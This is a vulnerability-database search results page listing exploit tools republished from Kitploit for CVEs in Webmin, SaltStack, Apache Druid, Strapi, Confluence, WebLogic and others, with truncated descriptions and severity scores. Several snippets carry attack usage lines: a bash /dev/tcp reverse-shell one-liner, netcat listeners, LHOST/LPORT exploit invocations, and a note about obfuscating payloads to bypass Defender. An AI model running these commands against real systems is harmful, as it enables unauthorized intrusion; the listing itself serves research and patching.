Lucene search
+L

2528 matches found

Kitploit
Kitploit
added 2026/09/11 11:15 a.m.11 views

CVE-2024-23692

CVE-2024-23692 - Rejetto HFS Remote Code Execution RCE A tactical documentation and exploit guide for CVE-2024-23692 , an unauthenticated critical Remote Code Execution RCE vulnerability affecting Rejetto HTTP File Server HFS versions prior to 2.3m. This guide leverages an In-Memory Reverse Shell...

9.8CVSS8.4AI score0.99471EPSS
SaveExploits21References1
Kitploit
Kitploit
added 2026/09/11 10:56 a.m.4 views

SaltStack-Exp

SaltStack-Exp CVE-2020-11651&&CVE-2020-11652 EXP root@kitploit: Exec-Master: python exp.py --exec-choose master --exec-cmd "whoami" Exec-Minions: python exp.py --exec-choose minions --exec-cmd "whoami" GetShell: python exp.py --shell-LHOST 8.8.8.8 --shell-LPORT 4444 ReadFile: python exp.py --read...

9.8CVSS8AI score0.96614EPSS
SaveExploits23
Kitploit
Kitploit
added 2026/09/11 10:34 a.m.8 views

CVE-2021-25646

usage: python3 CVE-2021-25646.py -u http://x.x.x.x -c cmd Reverse shell as follows: Write reverse shell script python3 CVE-2021-25646.py -u http://x.x.x.x -c "echo 'bash -i & /dev/tcp/x.x.x.x/xxxx 0&1' /tmp/1.sh" Grant execution permission to the shell script python3 CVE-2021-25646.py -u...

9CVSS7.7AI score0.99001EPSS
SaveExploits8
Kitploit
Kitploit
added 2026/09/11 10:22 a.m.4 views

CVE-2019-15107

CVE-2019-15107 https://www.cvedetails.com/cve/CVE-2019-15107/ An issue was discovered in Webmin =1.920. The parameters "old" and "expire" in passwordchange.cgi contain a command injection vulnerability. Usage 1. Start a listener on red box. root@kitploit: rlwrap -cAr nc -lvp 1919 2. Run the explo...

10CVSS8.4AI score0.99766EPSS
SaveExploits39
Kitploit
Kitploit
added 2026/09/11 10:22 a.m.5 views

webmin_1.920

CVE-2019-15107 Webmin 1.920 未认证远程命令执行 一个针对 CVE-2019-15107 Webmin 1.920 未认证远程命令执行的 Python3 脚本,它利用 mkfifo 创建反向 Shell 或伪交互式 Shell 以绕过防火墙。 开始使用 执行程序 使用 python3 root@kitploit: python3 webmin.py -t https://webmin.site/ -lhost 127.0.0.1 -lport 9001 正向 Shell 防火墙绕过 root@kitploit: python3 webmin.py -t...

10CVSS8.4AI score0.99766EPSS
SaveExploits39
Kitploit
Kitploit
added 2026/09/11 10:21 a.m.7 views

strapi_cms_3.0.0-beta.17.7

Strapi CMS CVE-2019-18818 and 19606 Blind Remote Code Execution of Strapi CMS Version 3.0.0-beta.17.7 and earlier to get reverse shell Getting Started Executing program Using python3 root@kitploit: python3 strapiexp.py -t http://strapi.hack/ -e [email protected] -p newpassword -lhost 127.0.0...

9.8CVSS8.2AI score0.97639EPSS
SaveExploits13
Kitploit
Kitploit
added 2026/09/11 10:17 a.m.5 views

OTRS-4.0.1-6.0.1-Remote-Command-Execution

OTRS-4.0.1-6.0.1 Remote Command Execution This exploit is developed based on https://www.exploit-db.com/exploits/43853 It will perform the authentication against OTRS panel and provide a reverse shell. Usage: python3 CVE-2017-16921.py CVE-2017-16921: In OTRS 6.0.x up to and including 6.0.1, OTRS...

9CVSS7.8AI score0.19901EPSS
SaveExploits8
Kitploit
Kitploit
added 2026/09/11 9:40 a.m.7 views

Codiad-CVE-2018-14009

安装 codiad @ git clone https://github.com/Codiad/Codiad.git 复现步骤 1. 在 ubuntu 服务器上使用 Codiad 2.8.4(最新版本)搭建一个易受攻击的环境 root@kitploit: @ chmod o+w config.php @ chmod o+w workspace @ chmod o+w plugins @ chmod o+w themes @ chmod o+w data 2. @ git clone...

10CVSS8.1AI score0.38444EPSS
SaveExploits4References1
Kitploit
Kitploit
added 2026/09/11 9:12 a.m.8 views

rsg

反向 Shell 生成器 - rsg 一款用于生成多种反向 Shell 方式的工具 使用示例 反向 Shell 参考资料 http://bernardodamele.blogspot.com.br/2011/09/reverse-shells-one-liners.html http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet...

5.9AI score
SaveExploits0
Kitploit
Kitploit
added 2026/09/11 8:43 a.m.6 views

CVE-2021-31630

CVE-2021-31630 修改了Fellipe Oliveira为HTB编写的PoC CVE-2021-31630脚本 用法 '示例用法: exploit.py -u http://target-uri:8080 -l admin -p admin -i 192.168.1.54 -r 4444 -P program.st"'...

9CVSS7.8AI score0.27075EPSS
SaveExploits10
Kitploit
Kitploit
added 2026/09/11 8:42 a.m.4 views

Joomla_CVE-2015-8562

JoomlaCVE-2015-8562 Joomla CVE-2015-8562 漏洞的概念验证(对象注入远程代码执行) 简介/变更日志 该 PoC 是托管在 exploit-db 上的实现的第二个版本。 root@kitploit: -修复(重新生成会话) -添加了从 X-Forwarded-For 切换到 User-Agent 方法的选项 -添加了从 Python 反向 shell 切换到 bash 的选项 -添加了对缺少 http 架构和脚本终止异常的捕获 -为更好的使用体验、更好的消息和颜色进行了编辑 -TODO: 添加 msf 支持 如何使用 root@kitploit: gi...

7.5CVSS7.9AI score0.98283EPSS
SaveExploits16
Kitploit
Kitploit
added 2026/09/11 8:36 a.m.3 views

CVE-2023-38831_Exploit

CVE-2023-38831 Exploit Prueba de Concepto Resumen Este repositorio contiene un script en Python que demuestra una prueba de concepto PoC del exploit para CVE-2023-38831. Este exploit aprovecha una vulnerabilidad en mecanismos específicos de procesamiento de archivos para ejecutar un payload de...

7.8CVSS7.3AI score0.97894EPSS
SaveExploits49
Kitploit
Kitploit
added 2026/09/11 8:02 a.m.8 views

hoaxshell

hoaxshell ⚡ 本项目的最新版本是 HoaxShell 独立监听器,它带有更新的有效载荷模板。你也可以直接从 https://revshells.com 使用(确保选择 hoaxshell 作为监听器)。 ⚠️ 截至 2022-10-18,hoaxshell 已被 AMSI 检测到(恶意软件百科)。你需要混淆生成的有效载荷才能使用。查看本视频了解如何手动混淆并绕过 MS Defender: Hoaxshell 示例 - youtube.com/watch?v=iElVfagdCD4 常见 PowerShell 反弹 shell 模板示例 -...

6AI score
SaveExploits0References3
Kitploit
Kitploit
added 2026/09/11 7:54 a.m.6 views

OpenWire-CVE-2023-46604-Investigation

OpenWire-CVE-2023-46604-Investigation OpenWire Lab During my shift as a Tier 2 Security Operations Center SOC Analyst, I received an escalation from a Tier 1 analyst regarding a publicly accessible server that had been observed communicating with multiple suspicious external IP addresses. In...

10CVSS7.6AI score0.99723EPSS
SaveExploits33
Kitploit
Kitploit
added 2026/09/11 7:52 a.m.7 views

CVE-2024-24386

VitalPBX - CVE-2024-24386 漏洞标题:命令注入 作者:Erick Duarte 版本: 3.2.5-2 该漏洞出现在使用任务管理器模块结合Cron Profile时。要利用此漏洞,我们需要在操作系统中的特定文件夹中放置一个脚本。该文件夹为"/var/lib/vitalpbx/scripts"。 出于好奇,我开始使用Burp分析发送到服务器的内容。为此,我创建了一个Cron Profile,使其每分钟执行一次。 接下来,我继续创建任务管理器。...

7.2CVSS5.7AI score0.01024EPSS
SaveExploits1
Kitploit
Kitploit
added 2026/09/11 7:16 a.m.11 views

CVE-2017-12149

CVE-2017-12149 CVE-2017-12149 JBOSS as 6.X Deserialization Reverse Shell Version Rewritten GUI interface based on the author's command-line mode detail:http://www.cnblogs.com/sevck/p/7874438.html...

9.8CVSS8.3AI score0.90713EPSS
SaveExploits14
Kitploit
Kitploit
added 2026/09/11 7:15 a.m.10 views

CVE-2020-5902-rce-gui

CVE-2020-5902-RCE-Big Vulnerability Exploitation Tool GUI Version v1.0 Tool Usage Instructions For command execution, if the first execution fails, you can try several more times. Batch Target Address Detection Execute Reverse Shell Single Target Address Detection File Upload...

10CVSS7.4AI score0.99999EPSS
SaveExploits62
Kitploit
Kitploit
added 2026/09/11 7:13 a.m.7 views

CVE-2020-14882_Exploit_Gui

CVE-2020-14882ExploitGui The tool is for authorized use only. I bear no responsibility for unauthorized attacks that lead to criminal cases. Please be familiar with the Cybersecurity Law. During a penetration test, I encountered 14882 and couldn't find a usable GUI POC, so I refactored it. I...

10CVSS8.4AI score0.99997EPSS
SaveExploits42
Kitploit
Kitploit
added 2026/09/11 6:57 a.m.9 views

CVE-2023-22527-confluence

CVE-2023-22527-confluence Confluence CVE-2023-22527 realworld poc Usage Download bun https://github.com/oven-sh/bun/releases Start ngrok root@kitploit: ngrok tcp 4444 Listen localhost 4444 root@kitploit: nc -nvlp 4444 Run exploit root@kitploit: bun exploit-CVE-2023-22527.js --lhost...

10CVSS8.5AI score0.99984EPSS
SaveExploits34References1
Kitploit
Kitploit
added 2026/09/11 6:19 a.m.6 views

CVE-2019-18818_CVE-2019-19609

Exploits for CVE-2019-18818 and CVE-2019-19609 This repository contains a Python script to exploit two vulnerabilities: CVE-2019-18818 and CVE-2019-19609. CVE-2019-18818 This vulnerability allows an attacker to reset the password of an admin user in the Strapi CMS. Usage 1. Modify the target and...

9.8CVSS7.7AI score0.97639EPSS
SaveExploits21
Rows per page
Query Builder